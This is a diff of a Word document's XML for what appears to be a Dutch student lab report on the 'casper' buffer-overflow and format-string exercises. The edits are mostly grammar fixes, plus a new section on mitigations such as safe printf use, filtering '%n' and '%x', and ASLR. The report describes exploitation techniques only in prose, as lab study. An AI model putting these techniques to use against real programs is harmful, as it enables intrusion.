+      <w:bookmarkStart w:id="11" w:name="_Toc26708936"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4978,7 +5103,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>ode kan aangepast worden door gebruik maakt van de “</w:t>
+        <w:t xml:space="preserve">ode kan aangepast worden door gebruik </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>te maken</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van de “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5078,7 +5215,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> kunnen in dit geval niet gebruikt worden omdat er in deze aanval enkel een functie pointer wordt overschreven en niet helemaal tot aan de return adres.</w:t>
+        <w:t xml:space="preserve"> kunnen in dit geval niet gebruikt worden omdat er in deze aanval enkel een functie pointer wordt overschreven en niet helemaal tot aan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>het</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> returnadres.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5171,7 +5320,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc26704213"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc26708937"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -5196,7 +5345,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>ezelfde structuur als casper6. Het enige verschil is dat de het gebruik maakt van de “</w:t>
+        <w:t>ezelfde structuur als casper6. Het enige verschil is dat het gebruik maakt van de “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5235,7 +5384,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen. Het bevat nog steeds dezelfde </w:t>
+        <w:t xml:space="preserve"> kan gebruikt worden omdat deze oplossing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>geen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gebruik maakt van environment variabelen. Het bevat nog steeds dezelfde </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5299,7 +5460,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc26704214"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc26708938"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -5320,7 +5481,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc26704215"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc26708939"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -5461,7 +5622,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc26704216"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc26708940"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
@@ -5602,7 +5763,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc26704217"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc26708941"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -6118,7 +6279,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc26704218"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc26708942"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -6199,7 +6360,31 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit programma is het maximum gelijk aan 999 karakters.</w:t>
+        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit programma is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">het maximum gelijk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>aan 999 karakters.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6329,7 +6514,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Een vierde manier door de environment variabelen te cleanen in het programma. </w:t>
+        <w:t xml:space="preserve">Een vierde manier </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">door de environment variabelen te cleanen in het programma. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6412,7 +6609,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc26704219"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc26708943"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -6503,7 +6700,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc26704220"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc26708944"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -6524,7 +6721,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc26704221"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc26708945"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -6666,13 +6863,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">” functie opgeroepen worden met de meegegeven input. Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>gebruik maken van een string format functie “</w:t>
+        <w:t>” functie opgeroepen worden met de meegegeven input. Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens gebruik maken van een string format functie “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6759,7 +6950,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc26704222"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc26708946"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
@@ -6884,7 +7075,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc26704223"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc26708947"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -7095,6 +7286,12 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
         <w:t>, zie naar de onderlijnde bytes</w:t>
       </w:r>
       <w:r>
@@ -7113,14 +7310,34 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">over 2 hexadecimale waarden. Maar dit is makkelijk om te lossen door voor deze string nog een </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>dummie</w:t>
+        <w:t>over 2 hexadecimale waarden. Maar dit is makkelijk o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="23" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="23"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> te lossen door voor deze string nog een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dumm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7322,7 +7539,13 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> adres te wijzen</w:t>
+        <w:t xml:space="preserve"> adres te </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>springen</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7421,7 +7644,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc26704224"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc26708948"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -7430,17 +7653,183 @@
         <w:lastRenderedPageBreak/>
         <w:t>Mitigation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="24"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze aanval kan op v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">erschillende manieren worden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gemitigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De implementatie van de c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ode kan aangepast worden door gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">“ functie met 2 parameters. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze extra parameter </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“%s” gaat er voor zorgen dat de string niet geïnterpreteerd worden als een format string.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een tweede manier is om te checken of de invoer gebruik maakt van speciale karakters zoals “%n” en “%x”. Deze karakters kunnen eruit gefilterd worden.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een derde manier is om gebruik te maken van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ASLR, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Space </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Layout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Randomization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Dit maakt het moeilijker om het correcte adres te specifiëren van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:footerReference w:type="default" r:id="rId9"/>
@@ -7490,7 +7879,6 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
-    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -9210,6 +9598,36 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Ballontekst">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:link w:val="BallontekstChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C540B7"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="BallontekstChar">
+    <w:name w:val="Ballontekst Char"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:link w:val="Ballontekst"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00C540B7"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -9425,6 +9843,13 @@
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
+  <w:font w:name="Segoe UI">
+    <w:panose1 w:val="020B0502040204020203"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="swiss"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
 </w:fonts>
 </file>
 
@@ -9446,7 +9871,7 @@
     <w:rsidRoot w:val="007B5ECD"/>
     <w:rsid w:val="00183736"/>
     <w:rsid w:val="003F63A5"/>
-    <w:rsid w:val="005118BD"/>
+    <w:rsid w:val="0057170C"/>
     <w:rsid w:val="007B5ECD"/>
     <w:rsid w:val="00CA0CD2"/>
     <w:rsid w:val="00DE32B4"/>
@@ -10224,7 +10649,7 @@
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <CoverPageProperties xmlns="http://schemas.microsoft.com/office/2006/coverPageProps">
-  <PublishDate>R0627054</PublishDate>
+  <PublishDate>r0627054</PublishDate>
   <Abstract/>
   <CompanyAddress/>
   <CompanyPhone/>
@@ -10246,7 +10671,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A40D9761-D3DA-4944-B538-A8B2BA7C06F0}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4AC848E1-9296-40D4-8B79-3F44621A4FB8}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
